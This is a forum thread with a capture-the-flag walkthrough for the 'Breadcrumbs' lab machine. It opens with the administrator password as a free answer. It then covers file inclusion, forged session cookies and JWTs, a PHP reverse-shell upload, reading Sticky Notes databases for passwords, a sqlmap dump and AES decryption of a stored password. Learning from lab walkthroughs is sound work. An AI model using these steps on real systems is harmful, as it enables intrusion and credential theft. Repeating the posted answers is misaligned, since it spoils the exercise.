FLAG free no credits Breadcrumbs admin ssh + description tutorial
by paulwatson42016 - February 21, 2021 at 02:18 PM
#1
ssh [email protected]
Password: [email protected][email protected]#$9890./

Description

LFI on the books page: make a POST request to search for a book, change the request so the method variable is 1, remove title and author and replace them with book
book=../index.php&method=1
in the GET request

Use it to read files
Find the secret key for the tokens and the PHP for how cookies are made by looking at the files for the portal sign

Read the code for the cookie. The PHPSESSID is created by MD5 hashing a string that has a random letter from the user's name
Get Paul's PHPSESSID
paul47200b180ccd6835d25d034eeb6e6390

Create a new JWT token using the secret key you found; now the token is
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Log in to the portal with a random account, edit your cookies with the tokens and refresh

Now you are Paul

Go to file management and upload a PHP script in a file (maybe like reverseshell.html), intercept it with Burp Suite and change the .zip at the bottom to .php; if that does not work, fill in a title and author like a valid book from http://10.10.10.228/books

Go to http://10.10.10.228/portal/uploads, where you can execute your file, and now you have command execution

Look through the folders and find Juliette's password

SSH to the box

Now you need the development user
Go to the location on Windows where Sticky Notes are stored and download the
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal

%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
If the directory does not work, go to C:\Users and find the directory manually

Open the SQL (I copied it back to my box using SMB)
Get all the notes, then SSH as development with the password in the note

Now root
Go to C:\Development
There is a Linux binary there that has useful information inside

Inside there is a command, and you can see what it does when you run it on the box:

curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing

run on the box

This gets the AES key, but you can also run sqlmap through the URL; port forward so you can do it on Kali

ssh -N -L 1234:127.0.0.1:1234 [email protected]
curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'


Run sqlmap with the flag --dump against
http://127.0.0.1/index.php?method=select&username=administrator&table=passwords

It gives the output string
H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

With a key
k19D193j.<19391(

Base64 decode the string
After the Base64 decode, do the AES decrypt
Use CyberChef with input and output mode Raw
Key in Latin1 and IV in hex (IV = 0000000000000000)

You get [email protected][email protected]#$9890./

SSH as administrator with the password
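As an added example (not from the post or from the box's code): decoding the token quoted above shows its header and payload, and the sign/verify pair shows what the portal's server computes over them with its HS256 secret. The secret here is a labelled placeholder, since the real one only exists in the portal's PHP source, so the quoted token does not verify under it.

```python
import base64
import hashlib
import hmac
import json

# Token quoted in the post above: header.payload.signature, base64url without padding.
TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
         "eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ."
         "7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU")

# Placeholder: the real signing secret is only in the portal's PHP source, not on this page.
PLACEHOLDER_SECRET = b"PLACEHOLDER_SECRET_FROM_PORTAL_SOURCE"


def b64url_decode(s: str) -> bytes:
    """base64url decode, restoring the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_unverified(token: str):
    """Header and payload are only encoded, not encrypted: anyone holding the token can read them."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """What the server computes: HMAC-SHA256 over 'header.payload' with its secret."""
    # compact separators reproduce the exact header/payload segments of the quoted token
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    """Server-side check: pin the algorithm, then compare signatures in constant time."""
    try:
        h, p, s = token.split(".")
        if json.loads(b64url_decode(h)).get("alg") != "HS256":
            return False  # rejects alg=none and algorithm-confusion tokens
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        return hmac.compare_digest(expected, b64url_decode(s))
    except ValueError:  # malformed base64, JSON, or segment count
        return False
```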
#2
Thanks for sharing. I was stuck in the last part for decrypting the password.
You can use php's openssl_decrypt to perform the decryption as well!
#3
(February 22, 2021 at 05:52 PM)ra1der1337 Wrote: Thanks for sharing. I was stuck in the last part for decrypting the password.
You can use php's openssl_decrypt to perform the decryption as well!
use cyberchef like this:
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0
#4
I don't really understand this writeup from the beginning; can someone explain it better? Sorry for disturbing.
#5
(February 21, 2021 at 02:18 PM)paulwatson42016 Wrote: ssh [email protected]

Thank you very much for this
#6
Could you kindly give me more info about the LFI?

I tried to detect it through Burp and make the changes that you indicate, but nothing.

Thanks a lot

(February 21, 2021 at 02:18 PM)paulwatson42016 Wrote: ssh [email protected]
#7
Thanks for the tips

I found the LFI but I'm having trouble creating the cookie, because of the key format in PHP

You can send me a DM so as not to spam this thread (I'm a new user so I can't send you a DM)

Thanks
#8
Thanks bro, I want to mention something.
(i) LFI not in search you should.
(ii) search book with author t
(iii) intercept request to view book name
(iv) change book=book name to book=../index.php
#9
(March 10, 2021 at 06:49 PM)nonnaru Wrote: Thanks bro, I want to mention something.
(i) LFI not in search you should.
(ii) search book with author t
(iii) intercept request to view book name
(iv) change book=book name to book=../index.php

That's what I put: make a POST request by searching for a book, intercept the request and modify the method and book parameters
#10
Is someone able to find a detailed writeup? Especially on the part about creating the JWT!
#11
(March 11, 2021 at 06:45 PM)UltraMagnus Wrote: Is someone able to find a detailed writeup? Especially on the part about creating the JWT!

It's not difficult, use this: https://jwt.io/
Just type in the information
#12
(March 12, 2021 at 12:57 PM)paulwatson42016 Wrote:
(March 11, 2021 at 06:45 PM)UltraMagnus Wrote: Is someone able to find a detailed writeup? Especially on the part about creating the JWT!

It's not difficult, use this: https://jwt.io/
Just type in the information

I am familiar with JWTs; the part where we create the cookie referring to the PHP code is what's bugging me. I do understand the code about how it's creating cookies, but somehow I am failing to replicate it!
